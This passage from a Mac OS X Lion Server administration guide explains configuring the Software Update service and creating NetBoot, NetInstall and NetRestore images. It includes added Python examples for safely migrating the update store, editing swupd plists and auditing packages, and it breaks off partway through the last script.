Your server synchronizes with the Apple Software Update server by requesting a catalog of available updates. If you chose to automatically copy updates, your server downloads all available software update packages. See Start Software Update.

(Optional) Manually copy and enable selected packages

If you do not choose to automatically copy and enable all Apple software updates, you must manually select the software update packages to copy and enable. See Copy and enable selected updates from Apple.

Set up client computers to use the correct Software Update server

Set preferences in Workgroup Manager by user, group, or computer to access your Software Update server. For more information about configuring managed preferences for the Software Update server, see Workgroup Manager Help.

Test your Software Update server setup

Test Software Update by requesting software updates from the server using a client bound to the preferences you set in Workgroup Manager. Make sure the packages are accessible to your users.

Considerations and requirements


Before you set up Software Update on your server, you must be familiar with your network configuration and meet the following requirements:

You're the server administrator.
You're familiar with network setup. You might also need to work with your networking staff to change network topologies, switches, routers, and other network settings.

Client computer requirements

Macintosh computers running Mac OS X v10.5 or later that are networked to a server running Mac OS X Server v10.5 or later can use Software Update to update Apple software.

Network hardware requirements

The type of network connection to use depends on the number of clients you expect to serve software updates to:

To provide regular updates to fewer than 10 clients, use 100-Mbit Ethernet.
To provide regular updates to 10 to 50 clients, use 100-Mbit switched Ethernet.
To provide regular updates to more than 50 clients, use Gigabit Ethernet.

These are estimates of the number of clients supported.

Note: In Lion Server, Software Update operates across all network interfaces that TCP/IP is configured for.

Capacity planning

The number of client computers your server can support when accessing Software Update depends on how your server is configured, when and how often your clients check for updates, the size of the updates, and a number of other factors. When planning for your server and network needs, consider these main factors:

Ethernet speed: 100Base-T or faster connections are required for client computers and the server. As you add clients, you might need to increase the speed of the Ethernet connections of your server. Ideally you want to take advantage of the Gigabit Ethernet capacity built in to your Mac server hardware to connect to a Gigabit switch. From the switch, connect Gigabit Ethernet or 100-Mbit Ethernet to each Macintosh client.
Hard disk capacity and number of packages: Software Update packages can occupy considerable hard disk space on server volumes, depending on the size and configuration of the packages and the number of packages being stored.
Number of Ethernet ports on the switch: Distributing Macintosh clients over multiple Ethernet ports on your switch offers a performance advantage. Each port must serve a distinct segment.
Number of Software Update servers on the network: You might want to provide different software updates to various groups of users. By configuring directory services you can offer different update services by network or hardware type, each targeting a different Software Update server on the network.

Note: You can't configure Software Update servers to talk to one another.

Software Update storage

Software updates can easily take a large amount of disk space over time and cause problems with system resources. In a production environment, it is important to prevent the system disk from becoming full and causing instability. To eliminate the possibility of software updates filling a volume, system administrators normally limit the type of data stored on the root partition and place data that could grow substantially in size on other partitions. For example, you could use an Xserve RAID to store software updates. By default, software updates are stored in the /var/db/swupd/ folder. To store software updates in another location, choose a different partition or volume in the Software Update General settings pane.

Consider which Software Update packages to offer

Before you set up Software Update, consider whether to provide all or only part of Apple's software updates. Your client computers might run application software that requires a specific version of Apple software to operate correctly. You can configure your Software Update server to serve only the Software Update packages you approve. Restricting access to update packages might help prevent maintenance and compatibility problems with your computers. You restrict client access by disabling the automatic mirror-and-enable functions in the General settings pane and then managing specific updates in the Updates pane of the Software Update server.

Organize your enterprise client computers

You might have individuals, groups, or groups of computers with common needs for only a few software update packages, while others might need unrestricted access to all software updates. To provide varied access to software update packages, you must set up multiple Software Update servers. Use managed preferences to configure these computers to access a specific Software Update server. For more information about configuring managed preferences for the Software Update server, see Workgroup Manager Help.

Modify existing Software Update storage


Storing software updates can take up large amounts of disk space. You can prevent overloading your startup disk by changing the default storage location of software updates from the /var/db/swupd/ folder to a partition or volume with a larger capacity.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Software Update.
4. If Software Update is started, click the Stop Software Update button.
5. Click General.
6. Click Choose and select the location to store downloaded software updates.
7. Click Save.
8. (Optional) If software updates were previously downloaded, use Terminal to copy the default software update folder, with its ownership and permissions, to the new location:

$ sudo cp -Rp /private/var/db/swupd/html /Volumes/My_Volume/My_Software_Updates_Folder/

9. Click the Start Software Update button to confirm the operation.
10. (Optional) After confirming that the service serves updates from the new location, use Terminal to delete the previous storage location and reclaim startup volume space:

$ sudo rm -rf /private/var/db/swupd/html
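The risk in steps 8 and 10 is deleting the only copy of the package store before the copy has been checked. The following Python is an added example, not from Apple's documentation: it copies the tree preserving mode bits and timestamps, compares the copy byte for byte and mode for mode, and removes the source only when the comparison passes. The directories it uses are constructed temporary trees; it assumes the store is an ordinary directory tree. One caveat it does not handle is ownership: Python's copy routines do not restore the owner, and since the page says swupd_syncd must run as _softwareupdate to keep permissions intact, check the owner of the new location with `ls -l` after a real migration.

```python
"""Copy, verify, then delete a Software Update package store (added example).

Not Apple's code. Uses constructed temporary directories so it runs anywhere;
point migrate_updates() at /private/var/db/swupd/html and the new volume for
real use (run as root). Ownership is not restored by shutil and must be
checked separately.
"""
import filecmp
import os
import shutil
import tempfile


def _tree_matches(src, dst):
    """Recursively compare two trees: same names, same bytes, same mode bits."""
    cmp = filecmp.dircmp(src, dst)
    if cmp.left_only or cmp.right_only or cmp.funny_files:
        return False
    _match, mismatch, errors = filecmp.cmpfiles(src, dst, cmp.common_files, shallow=False)
    if mismatch or errors:
        return False
    for name in cmp.common_files:
        if os.stat(os.path.join(src, name)).st_mode != os.stat(os.path.join(dst, name)).st_mode:
            return False
    return all(_tree_matches(os.path.join(src, d), os.path.join(dst, d))
               for d in cmp.common_dirs)


def migrate_updates(src, dst, remove_source=False):
    """Copy src to dst, verify the copy, and only then (optionally) delete src.

    Returns True when dst is a verified copy. If verification fails the
    source is left untouched and the caller decides what to do with dst.
    """
    if os.path.exists(dst):
        raise FileExistsError("refusing to merge into existing %s" % dst)
    shutil.copytree(src, dst, symlinks=True)   # copy2 keeps mode and mtime
    if not _tree_matches(src, dst):
        return False
    if remove_source:
        shutil.rmtree(src)
    return True


def make_sample_tree():
    """Constructed stand-in for the html folder: two packages, one nested."""
    base = tempfile.mkdtemp()
    src = os.path.join(base, "html")
    os.makedirs(os.path.join(src, "content", "downloads"))
    with open(os.path.join(src, "catalogs.sucatalog"), "wb") as f:
        f.write(b"<plist/>")
    with open(os.path.join(src, "content", "downloads", "041-0000.pkg"), "wb") as f:
        f.write(b"\x00" * 4096)
    os.chmod(os.path.join(src, "catalogs.sucatalog"), 0o644)
    return src, os.path.join(base, "My_Software_Updates_Folder", "html")


if __name__ == "__main__":
    src, dst = make_sample_tree()
    print("migrated:", migrate_updates(src, dst, remove_source=True))
    print("source still present:", os.path.exists(src))
```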

Turn on Software Update


Before you can configure Software Update settings, you must turn on Software Update in Server Admin.

1. Open Server Admin and connect to the server.
2. Click Settings.
3. Click Services.
4. Select the Software Update checkbox.
5. Click Save.

Configure Software Update general settings


You can use the General settings to set system update copy and enable settings, to remove obsolete updates, and to limit user bandwidth.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Software Update.
4. Click Settings.
5. To limit client user bandwidth, select Limit user bandwidth for updates to and enter the maximum rate of update bandwidth per user.
6. From the pop-up menu, choose KB/second or MB/second.
7. Click Choose and select where the Software Update catalog and downloads will be stored. The default location is /var/db/swupd/.
8. To specify the port through which software updates are provided, enter a port number in the Provide updates using port field.
9. To keep a copy of the software updates on your server, select Copy __ updates from Apple and choose one of the following options. If you want all updates copied from the Apple update server, choose all in the pop-up menu. If you want only new updates copied from the Apple update server, choose all new in the pop-up menu.
10. To immediately enable all software updates for client users, select Automatically enable copied updates. Enabling this feature retrieves all Apple-published catalog updates and disables deprecated software packages that have a replacement package available. An administrator can disable the new software package and continue offering the deprecated package. If this feature is not selected and an administrator manually enables updates, deprecated software packages are disabled as their individual replacement packages are enabled.
11. To remove obsolete software updates from the Software Update storage location, select the Delete outdated software update packages checkbox. Enabling this feature does not remove obsolete or deprecated software updates from the local Software Update catalog.
12. Click Save.

Configure Updates settings


You can use Updates settings to refresh the software update catalog, to copy and enable individual updates, and to view specific update information. Downloading Apple updates disables deprecated software packages that have a replacement package available. An administrator can disable the new software package and continue offering the deprecated package.

To configure Updates settings

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Software Update.
4. Click Updates.
5. Click the Refresh button to synchronize with the Apple server. An unscheduled synchronization does not change or delay the next scheduled synchronization, which occurs every 24 hours at 03:00 (local time) by default. An administrator can change the scheduled synchronization time by modifying the StartCalendarInterval > Hour value in /System/Library/LaunchDaemons/com.apple.swupdate.sync.plist. To restore the default launchd settings, remove the com.apple.swupdate.sync.plist file and restart Software Update.
6. Click Copy Now to copy software updates to your server.
7. Select the checkbox in the Enable column for each update you want to make available to client computers. The Enable column is disabled if the Automatically enable copied updates checkbox is selected. To manually enable or disable updates, deselect that checkbox in the Settings pane.
8. Click Save.

Start Software Update


Use Server Admin to start Software Update.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Software Update.
4. Click the Start Software Update button (below the Servers list).

Redirect your Software Update server


To load-balance the distribution of Software Update across multiple Software Update servers, or to conserve bandwidth to the Internet, you can change the /etc/swupd/swupd.plist file to redirect where your Software Update server obtains software updates. By redirecting your Software Update server, you can have multiple Software Update servers on your private network. Only one Software Update server needs access outside your private intranet to obtain software updates from the Apple Software Update server; each additional server can then obtain the software updates from that internal server.

1. On each additional Software Update server that should obtain its updates from the internal server, open Terminal.
2. Enter the following command:

$ sudo vi /etc/swupd/swupd.plist

3. Locate the metaIndexURL key:

...
<key>metaIndexURL</key>
<string>http://swscan.apple.com/content/meta/mirror-config-1.plist</string>

4. Change the URL between the <string></string> tags to the location of your selected Software Update server. For example:

<key>metaIndexURL</key>
<string>http://myserver.example.com:8088/catalogs.sucatalog</string>

5. Save the changes and quit Terminal.
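Both of the property-list edits on this page, the metaIndexURL redirect above and the StartCalendarInterval > Hour change to com.apple.swupdate.sync.plist described under Configure Updates settings, are one-key changes that are easy to get wrong in vi. The following Python is an added example, not Apple's tooling: it makes both edits with the standard-library plistlib, and before rewriting metaIndexURL it checks that the new URL uses http or https and names a host on an allowlist of your own update servers, so a typo or a tampered script cannot quietly point the server at an arbitrary catalog source (the catalog is fetched over plain http, and only Apple's signature on the packages protects clients after that). The two plists below are constructed stand-ins that contain only the keys the page names; the real files have more.

```python
"""Edit swupd.plist and the swupd_syncd launchd job (added example, not Apple's code).

Works on plist bytes so it can be tested without touching
/etc/swupd/swupd.plist or /System/Library/LaunchDaemons/com.apple.swupdate.sync.plist.
The sample plists are constructed; only the keys the page names are assumed.
"""
import plistlib
from urllib.parse import urlsplit

# Constructed stand-in for /etc/swupd/swupd.plist.
SWUPD_PLIST = plistlib.dumps({
    "metaIndexURL": "http://swscan.apple.com/content/meta/mirror-config-1.plist",
})

# Constructed stand-in for com.apple.swupdate.sync.plist (default run at 03:00).
SYNC_PLIST = plistlib.dumps({
    "Label": "com.apple.swupdate.sync",
    "StartCalendarInterval": {"Hour": 3, "Minute": 0},
})


def redirect_meta_index(plist_bytes, new_url, allowed_hosts):
    """Point metaIndexURL at an approved internal server and return new bytes."""
    parts = urlsplit(new_url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("unsupported scheme: %r" % parts.scheme)
    if parts.hostname not in allowed_hosts:
        raise ValueError("host %r is not an approved update server" % parts.hostname)
    data = plistlib.loads(plist_bytes)
    if "metaIndexURL" not in data:
        raise KeyError("metaIndexURL missing; is this really swupd.plist?")
    data["metaIndexURL"] = new_url
    return plistlib.dumps(data)


def is_approved(url, allowed_hosts):
    """True if redirect_meta_index() would accept this URL."""
    try:
        redirect_meta_index(SWUPD_PLIST, url, allowed_hosts)
        return True
    except ValueError:
        return False


def set_sync_hour(plist_bytes, hour):
    """Change the hour of the daily swupd_syncd run. launchd accepts either a
    dict or a list of dicts for StartCalendarInterval; both are handled."""
    if not 0 <= hour <= 23:
        raise ValueError("hour must be between 0 and 23")
    data = plistlib.loads(plist_bytes)
    interval = data.get("StartCalendarInterval")
    if isinstance(interval, list):
        for entry in interval:
            entry["Hour"] = hour
    elif isinstance(interval, dict):
        interval["Hour"] = hour
    else:
        data["StartCalendarInterval"] = {"Hour": hour, "Minute": 0}
    return plistlib.dumps(data)


def meta_index_url(plist_bytes):
    return plistlib.loads(plist_bytes)["metaIndexURL"]


def sync_hour(plist_bytes):
    interval = plistlib.loads(plist_bytes)["StartCalendarInterval"]
    return interval[0]["Hour"] if isinstance(interval, list) else interval["Hour"]


if __name__ == "__main__":
    approved = {"myserver.example.com"}
    out = redirect_meta_index(SWUPD_PLIST,
                              "http://myserver.example.com:8088/catalogs.sucatalog", approved)
    print(meta_index_url(out))
    print(sync_hour(set_sync_hour(SYNC_PLIST, 22)))
```

To apply it to the real files, read them with `open(path, "rb").read()`, write the returned bytes back as root, and then stop and start Software Update so launchd reloads the job; keep the backup that `cp -p` of the original gives you before the rewrite.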

Point unmanaged clients to a Software Update server


Lion Server can publish separate catalogs for specific versions of Mac OS X. This allows each client to view only the updates that relate to the operating system installed on it. Lion Server supports catalogs for Mac OS X v10.5 or later clients. If you are not using client management and your clients run Mac OS X v10.5, you can use the defaults command in Terminal to point unmanaged client computers to a Software Update server. You must be an administrator to use the defaults command this way.

To point unmanaged clients to a Software Update server

1. Make a backup copy of the /Library/Preferences/com.apple.SoftwareUpdate.plist file, if it exists.
2. On the unmanaged client, open Terminal.
3. Enter the following command:

$ sudo defaults write /Library/Preferences/com.apple.SoftwareUpdate CatalogURL URL

Replace URL with the URL of the Software Update server, including the port number and the name of the catalog file for the specific version of Mac OS X. For example, for Mac OS X v10.5:

http://su.domain_name.com:8088/index-leopard.merged-1.sucatalog

You can verify your change using the following command:

$ defaults read /Library/Preferences/com.apple.SoftwareUpdate CatalogURL

To point the unmanaged client computer back to the Apple Software Update server, use the following command:

$ sudo defaults delete /Library/Preferences/com.apple.SoftwareUpdate CatalogURL

You can also revert these changes by replacing the /Library/Preferences/com.apple.SoftwareUpdate.plist file with the backup copy you made in step 1.

Manage Software Update

Manually refresh the updates catalog from the Apple server


Use Server Admin to manually update the updates catalog.

Note: Downloading Apple updates disables deprecated software packages that have a replacement package available. An administrator can disable the new software package and continue offering the deprecated package.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Software Update.
4. Click Updates.
5. Click the Refresh button.

Check the status of Software Update


Use Server Admin to check the status of Software Update.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Software Update.
4. Click Overview to see whether the service is running, when it started, when it last checked for updates, the number of updates that are copied or enabled, and whether auto-copy and auto-enable are turned on.
5. To review the Software Update service log, click Log.

Stop Software Update


Use Server Admin to stop Software Update.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Software Update.
4. Click the Stop Software Update button (below the Servers list).

Limit user bandwidth for Software Update


Use Server Admin to limit user bandwidth.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Software Update.
4. Click General.
5. Select Limit user bandwidth for updates to.
6. Enter the maximum rate of update bandwidth per user.
7. From the pop-up menu, choose KB/second or MB/second.
8. Click Save.

Limit Software Update server bandwidth


New in Lion Server is the syncBandwidth setting, which limits the bandwidth the Software Update server uses when syncing back to Apple. Like the user bandwidth limit, its value is expressed in KBytes/second (for example, 1024 = 1048576 Bytes/second). A value of zero disables the limit and allows syncing at the maximum bandwidth of the server and WAN connection. Use syncBandwidth to minimize the impact of the Software Update server where your organization has limited external bandwidth. This setting is not exposed in Server Admin, but it can be set with the serveradmin command-line tool:

To set the Software Update server's bandwidth:

$ sudo serveradmin settings swupdate:syncBandwidth = 1024

Note: This value sets an average rate limit; instantaneous transfer rates may slightly exceed the cap for short periods.

Automatically copy and enable updates from Apple

Use Server Admin to copy and enable software updates automatically from Apple. Enabling this feature retrieves all Apple-published catalog updates and disables deprecated software packages that have a replacement package available. An administrator can disable the new software package and continue offering the deprecated package. If this feature is not selected and an administrator manually enables updates, deprecated software packages are disabled as their individual replacement packages are enabled.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Software Update.
4. Click General.
5. Select Copy __ updates from Apple and choose from the pop-up menu: if you want all updates copied from the Apple update server, choose all; if you want only new updates copied from the Apple update server, choose all new.
6. Select Automatically enable copied updates.
7. Click Save.

Copy and enable selected updates from Apple


Use Server Admin to manually copy and enable selected software updates from Apple. Downloading Apple updates disables deprecated software packages that have a replacement package available. An administrator can disable the new software package and continue offering the deprecated package.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Software Update.
4. Click General.
5. Make sure Copy __ updates from Apple is deselected.
6. Make sure Automatically enable copied updates is deselected.
7. Click Save.
8. Click Updates.
9. Click Copy Now to copy software updates to your server.
10. To enable individual software updates, select the checkbox in the Enable column of each update.
11. Click Save.

Remove obsolete software updates


Use Server Admin to remove obsolete software updates from the packages stored on the server. You can configure Software Update to automatically purge obsolete updates.

Enabling this feature does not remove obsolete or deprecated software updates from the local Software Update catalog.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Software Update.
4. Click General.
5. Select the Delete outdated software update packages checkbox.
6. Click Save.

Identify individual software update files


Software updates are stored in the /var/db/swupd/ folder by default. Sometimes you might want to locate a specific software update file. Each software update that is copied to the server is stored with its product ID number as the file name. To make sure you select the correct software update file, correlate the file name (product ID) with the software update's product ID in Server Admin. Each software update lists its product ID below the description field in the Updates pane of Server Admin.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Software Update.
4. Click Updates.
5. Select the software update from the list. The software update's product ID is displayed below the description field.
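Correlating product IDs by eye in Server Admin does not scale to a store with hundreds of updates. The following Python is an added example, not Apple's tooling: it reads a .sucatalog, which is a property list whose Products dictionary is keyed by product ID, lists the package file names and sizes each product references, and audits a storage directory in which each product is stored under its product ID, reporting catalog products with no stored copy, stored entries no longer in the catalog, and stored files whose size disagrees with the catalog. The catalog content, product IDs and storage layout below are constructed; the Packages/URL/Size field names are assumptions about the catalog format, and you should check them against your own server's catalog before relying on the audit.

```python
"""Audit a Software Update store against its catalog (added example, not Apple's code).

Assumes: the catalog is a plist with Products keyed by product ID, each with a
Packages list of {URL, Size} dicts; on disk each product sits in a directory
named after its product ID. Sample catalog and tree are constructed.
"""
import os
import plistlib
import tempfile
from urllib.parse import urlsplit

# Constructed catalog with the assumed .sucatalog shape.
SAMPLE_CATALOG = plistlib.dumps({
    "CatalogVersion": 2,
    "Products": {
        "041-1234": {"Packages": [{"URL": "http://su.example.com:8088/content/041-1234/Update.pkg",
                                   "Size": 12}]},
        "041-5678": {"Packages": [{"URL": "http://su.example.com:8088/content/041-5678/Update.pkg",
                                   "Size": 5}]},
    },
})


def products(catalog_bytes):
    """Map product ID -> [(package file name, expected size), ...]."""
    cat = plistlib.loads(catalog_bytes)
    out = {}
    for pid, prod in cat.get("Products", {}).items():
        out[pid] = [(os.path.basename(urlsplit(p["URL"]).path), int(p.get("Size", 0)))
                    for p in prod.get("Packages", [])]
    return out


def audit_storage(catalog_bytes, storage_dir):
    """Compare catalog product IDs with the directories under storage_dir."""
    wanted = products(catalog_bytes)
    on_disk = {d for d in os.listdir(storage_dir)
               if os.path.isdir(os.path.join(storage_dir, d))}
    missing = sorted(set(wanted) - on_disk)      # in catalog, never copied
    orphans = sorted(on_disk - set(wanted))      # on disk, no longer in catalog
    bad = []                                     # present but wrong size/absent
    for pid in sorted(set(wanted) & on_disk):
        for name, size in wanted[pid]:
            path = os.path.join(storage_dir, pid, name)
            if not os.path.isfile(path) or os.path.getsize(path) != size:
                bad.append((pid, name))
    return {"missing": missing, "orphans": orphans, "bad": bad}


def make_sample_storage():
    """Constructed tree: 041-1234 complete, 041-5678 absent, 041-0001 orphaned."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "041-1234"))
    with open(os.path.join(root, "041-1234", "Update.pkg"), "wb") as f:
        f.write(b"x" * 12)
    os.makedirs(os.path.join(root, "041-0001"))
    return root


if __name__ == "__main__":
    print(audit_storage(SAMPLE_CATALOG, make_sample_storage()))
```

Against a real server, read the catalog your clients are given (the .sucatalog served on the port configured in General settings) and point storage_dir at the location shown in the General settings pane; a non-empty "bad" list after a sync is the symptom the swupd_syncd permissions warning at the top of this topic describes.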

Solve Software Update problems

General solutions to Software Update problems


Make sure required services are installed.
Make sure the Software Update packages you enable are meant for the clients accessing them.
If you detect poor response from the Software Update server, check the network load. For more information, see Considerations and requirements.
Delete old updates to make space for new ones.

If Software Update packages aren't visible to client computers

Make sure the packages are enabled in Server Admin.

If the Software Update server won't sync with the Apple server

Make sure the Apple server is accessible.

If a client computer can't access the Software Update server

Make sure the client can access the network.
Make sure the client's Software Update managed preference points to the Software Update server.
Make sure the Software Update server is running.

System Image Utility

Get started

About System Image Utility


The NetBoot, NetInstall, and NetRestore features of Mac OS X offer you alternatives for managing the operating system and application software that your Macintosh clients (or even other servers) require to start and do their work. Instead of going from computer to computer to install operating system and application software from CDs, you can prepare an installation image that installs on each computer when it starts up. You can also choose not to install software and instead have client computers start up (or boot) from an image stored on the server. (In some cases, clients don't even need their own hard disk.)

Using NetBoot and NetInstall, your client computers can start from a standardized Mac OS configuration suited to specific tasks. Because the client computers start from the same image, you can quickly update the operating system for users by updating a single boot image.

NetBoot requires a boot image. NetInstall requires an installation image. A boot image (.dmg file) is a file that looks and acts like a mountable disk or volume. NetBoot images contain the system software needed to act as a startup disk for client computers over the network. An installation image (.nbi folder) is an image that starts up the client computer long enough to install software from the image. The client can then start up from its own hard disk. Boot images and installation images are both disk images; the difference is that a .dmg file is the disk image proper and a .nbi folder is a bootable network volume that contains a .dmg disk image file. Disk images are files that behave like disk volumes.

You can set up multiple NetBoot or NetInstall images to suit the needs of groups of clients, or you can provide copies of the same image on multiple NetBoot servers to distribute the client startup load. You can also use a NetRestore image to quickly restore a volume.

NetBoot service can be used with NetBoot and NetInstall images, along with Mac OS X client management services, to provide a personalized work environment for each user.

Applications for setting up and managing images

You use the following Lion Server applications to set up and manage NetBoot, NetInstall, and NetRestore:

System Image Utility, to create Mac OS X Lion NetBoot, NetInstall, and NetRestore disk images. This utility is installed with Lion Server software in the /Applications/Server/ folder.
Server Admin, to enable and configure NetBoot service and supporting services. You can download Server Admin Tools at http://support.apple.com/downloads/. The Server Admin Tools are installed in the /Applications/Server/ folder.
PackageMaker, to create package files you use to add software to disk images.
Property List Editor, to edit property lists such as NBImageInfo.plist.

Note: To create an image, you must have valid Mac OS X Lion image sources or volumes. You cannot create an image of the startup disk you are running on.

Create NetBoot images


You can create NetBoot images of Mac OS X that you can then use to start client computers over the network. You can also assemble a workflow to create a NetBoot image that permits advanced customization of your images. For more information, see About workflows. You must purchase a Mac OS X user license for each client that starts from a NetBoot or NetInstall disk image.

1. Log in as an administrator user.
2. Open System Image Utility (in the /Applications/Server/ folder).
3. In the left sidebar, select the image source. If no image sources are listed, mount a valid Mac OS X Lion installation image or a valid Mac OS X Lion boot volume. To create an image, you must have valid Mac OS X Lion image sources or volumes. If you download the Mac OS X Lion install assistant from the App Store and install it, a valid Mac OS X Lion image source appears in the source list. You cannot create an image of the startup disk you are running on.
4. Select NetBoot Image and click Continue.
5. In the Network Disk field, enter a name for your image. This name identifies the image in the Startup Disk preferences pane on client computers.
6. (Optional) In the Description field, enter notes or other information to help you characterize the image. Clients can't see the description information.
7. If the image is served from more than one server, select the checkbox below the description field. This option generates an index ID for NetBoot server load balancing.
8. Click Create.
9. In the Save As dialog, choose where to save the image. If NetBoot service is configured on a network port and Server Admin is set to serve images from a volume, the NetBoot service share point folder NetBootSPn appears in the pop-up menu.

Important: Do not attempt to edit content in the image destination folder while the image is being created.

Create NetInstall images


Use System Image Utility to create a NetInstall image that you can use to install software on client computers over the network. You can find this application in the /Applications/Server/ folder. To create an image, you must have valid Mac OS X Lion image sources or volumes. If you download the Mac OS X Lion install assistant from the App Store and install it, a valid Mac OS X Lion image source appears in the source list. You cannot create an image of the startup disk you are running on.

1. Log in as an administrator user.
2. Open System Image Utility (in the /Applications/Server/ folder).
3. In the left sidebar, select the image source.
4. Select NetInstall Image and click Continue.
5. In the Network Disk field, enter a name for your image. This name identifies the image in the Startup Disk preferences pane on client computers.
6. (Optional) In the Description field, enter notes or other information to help you characterize the image. Clients can't see the description information.
7. If the image is served from more than one server, select the checkbox below the description field. This assigns an index ID to the image for NetBoot service load balancing.
8. Click Create.
9. In the Save As dialog, choose where to save the image. If you don't want to use the image name you entered earlier, change it by entering a name in the Save As field. If you're creating the image on the same server that will serve it, choose a volume from the "Serve from NetBoot share point on" pop-up menu. For this option to appear in the pop-up menu, NetBoot service must be configured on a network port and Server Admin must be set to serve images from a volume. To save the image somewhere else, choose a location from the Where pop-up menu or click the triangle next to the Save As field and navigate to a folder.

Important: Do not attempt to edit content in the image destination folder while the image is being created.

Create NetRestore images


If you have a client computer that's already configured, you can use System Image Utility to create a NetRestore image based on that client configuration. You can create a NetRestore image of a Mac OS X Lion volume that is used to restore client computers over the network using NetBoot service or the Apple Software Restore (asr) tool. When you create a NetRestore image, you are creating a clone of a volume. You can also use the asr tool to restore a system image onto a volume or to clone volumes. If you have multiple client computers to restore, you can use asr to restore them simultaneously.

You must start up from a volume other than the one you're using as the image source. For example, you could start up from an external FireWire hard disk or a second partition on the client computer's hard disk. You can't create the image on a volume over the network. You can also assemble a workflow to create a NetRestore image that permits advanced customization of your images. For more information, see About workflows.

To create an image, you must have valid Mac OS X Lion image sources or volumes. If you download the Mac OS X Lion install assistant from the App Store and install it, a valid Mac OS X Lion image source appears in the source list. You cannot create an image of the startup disk you are running on.

1. Log in as an administrator user.
2. Open System Image Utility (in the /Applications/Server/ folder).
3. In the left sidebar, select the image source. If no image sources are listed, mount a valid Mac OS X Lion installation image or a valid Mac OS X Lion boot volume.
4. Select NetRestore Image and click Continue.
5. In the Network Disk field, enter a name for your image. This name identifies the image in the Startup Disk preferences pane on client computers.
6. (Optional) In the Description field, enter notes or other information to help you characterize the image. Clients can't see the description information.
7. If the image is served from more than one server, select the checkbox below the description field. This assigns an index ID to the image for NetBoot service load balancing.
8. Click Create.
9. In the Save As dialog, choose where to save the image. If you don't want to use the image name you entered earlier, change it by entering a name in the Save As field. If you're creating the image on the same server that will serve it, choose a volume from the "Serve from NetBoot share point on" pop-up menu. For this option to appear in the pop-up menu, NetBoot service must be configured on a network port and Server Admin must be set to serve images from a volume. To save the image somewhere else, choose a location from the Where pop-up menu or click the triangle next to the Save As field and navigate to a folder.
10. Click Save and authenticate if prompted.

Important: Do not attempt to edit content in the image destination folder while the image is being created.

Create an image from a configured computer


If a client computer is configured, you can use System Image Utility to create a NetBoot or NetInstall image based on that client configuration. You must start up from a volume other than the one you're using as the image source. For example, you could start up from an external FireWire hard disk or a second partition on the client computer's hard disk. You can't create the image on a volume over the network. To create an image, you must have valid Mac OS X Lion image sources (volumes or an installation image). You cannot create an image of the startup disk you are running on.

1. Start up the computer from a partition other than the one you're imaging.
2. Install System Image Utility on the client computer.
3. Open System Image Utility on the client computer (in the /Applications/Server/ folder).
4. In the left sidebar, click the triangle next to Sources to expand the list of image sources.
5. From the expanded list, select the image source.
6. Select the type of image you want to create and click Continue: If your client computers will start up from this image, select NetBoot. If your image will be installed on a hard disk, select NetInstall. If your image is a clone of a volume, select NetRestore.
7. In the Image Name field, enter a name for your image. This name identifies the image in the Startup Disk preferences pane on client computers.
8. (Optional) In the Description field, enter notes or other information to help you characterize the image. Clients can't see the description information.
9. If the image is served from more than one server, select the checkbox below the description field. This option generates an index ID for NetBoot server load balancing.
10. For NetBoot images, if your source volume is a Mac OS X Lion installation image, enter a user name, short name, and password (in the Password and Verify fields) for the administrator account in Create Administrator Account. You can log in to a booted client using this account. This account is identical on every client that boots from the image, and its password hash is stored inside the image that NetBoot service hands out, so choose a strong, unique password for it.
11. Click Create.
12. In the Save As dialog, choose where to save the image. If you don't want to use the image name you entered earlier, change it by entering a name in the Save As field. To save the image somewhere else, choose a location from the Where pop-up menu or click the triangle next to the Save As field and navigate to a folder.
13. Click Save and authenticate if prompted. Important: Do not attempt to edit content in the image destination folder while the image is being created.
14. After the image is created on the client computer, copy it to the /Library/NetBoot/NetBootSPn share point on the server for use by NetBoot service. Images should be stored in this folder.
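Before copying an image into the NetBootSPn share point, it is worth checking that the NBImageInfo.plist inside the .nbi folder is consistent with how the image will be served, in particular that the index matches the load-balancing choice made in step 9 of the procedures above. The following script is an added example and is not code from this guide or from Apple. It assumes the keys System Image Utility writes into NBImageInfo.plist (Name, Index, IsEnabled, IsInstall, Type, RootPath, BootFile, Architectures) and the NetBoot index convention of 1 to 4095 for an image served by one server and 4096 to 65535 for an image served by several servers; the sample plist is constructed for the example.

```python
"""Check an NBImageInfo.plist before copying an image into /Library/NetBoot/NetBootSPn.

Added example, not code from the guide or from Apple. Assumptions: the plist keys
listed in REQUIRED_KEYS are those System Image Utility writes, and NetBoot uses
index 1-4095 for an image served by a single server and 4096-65535 for an image
served by more than one server (the load-balancing checkbox).
"""
import plistlib

# Constructed sample NBImageInfo.plist for this example.
SAMPLE_NBIMAGEINFO = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Name</key>           <string>Lion Lab NetBoot</string>
    <key>Description</key>    <string>Constructed sample image</string>
    <key>Index</key>          <integer>4097</integer>
    <key>IsEnabled</key>      <true/>
    <key>IsInstall</key>      <false/>
    <key>IsDefault</key>      <false/>
    <key>Type</key>           <string>NFS</string>
    <key>RootPath</key>       <string>NetBoot.dmg</string>
    <key>BootFile</key>       <string>booter</string>
    <key>Architectures</key>  <array><string>i386</string></array>
</dict>
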